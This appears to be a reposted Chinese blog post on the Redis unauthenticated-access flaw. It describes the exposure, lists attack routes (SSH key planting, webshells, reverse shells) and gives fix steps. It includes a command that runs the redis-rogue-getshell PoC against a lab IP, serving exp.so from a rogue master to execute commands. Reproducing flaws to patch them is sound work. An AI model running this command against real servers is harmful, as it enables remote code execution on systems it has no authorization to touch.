码迷,mamicode.com
首页 > 其他好文 > 详细

Redis 4.x/5.x 未授权访问漏洞

时间:2020-07-09 22:38:46      阅读:597      评论:0      收藏:0      [点我收藏+]

标签:技术   loading   免密   没有   密钥   http   alt   权限   load   

0x01 Redis是什么?

Redis是数据库,一个高性能的key-value存储系统,是使用ANSI C语言编写的。

0x02 Redis未授权访问漏洞

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

0x03 影响版本

影响版本Redis未授权访问在4.x/5.0.5版本以下

0x04 攻击手段

1.直接未授权访问,对redis数据库的操作

2.ssh免密钥登录(有思维导图)

3.对redis数据库写马子拿shell,与第二点条件和思路差不多

4.写进反弹shell,设置反弹时间反弹。

5.利用现有exp

0x05 漏洞复现(利用现有exp)

poc地址:

https://github.com/vulhub/redis-rogue-getshell

技术图片

编译

技术图片

攻击

python3 redis-master.py  -h

技术图片

python3 redis-master.py  -r 192.168.227.128 -p 6379 -L 192.168.227.129  -P 8989 -f RedisModulesSDK/exp.so  -c "id"

技术图片

修复方案

1.禁止一些高危命令(重启redis才能生效)

2.以低权限运行 Redis 服务(重启redis才能生效)切身体会

3.为 Redis 添加密码验证(重启redis才能生效)

4.禁止外网访问 Redis(重启redis才能生效)

5.修改默认端口

6.保证 authorized_keys 文件的安全

7.设置防火墙策略

Redis 4.x/5.x 未授权访问漏洞

标签:技术   loading   免密   没有   密钥   http   alt   权限   load   

原文地址:https://www.cnblogs.com/dyanbk/p/13276467.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!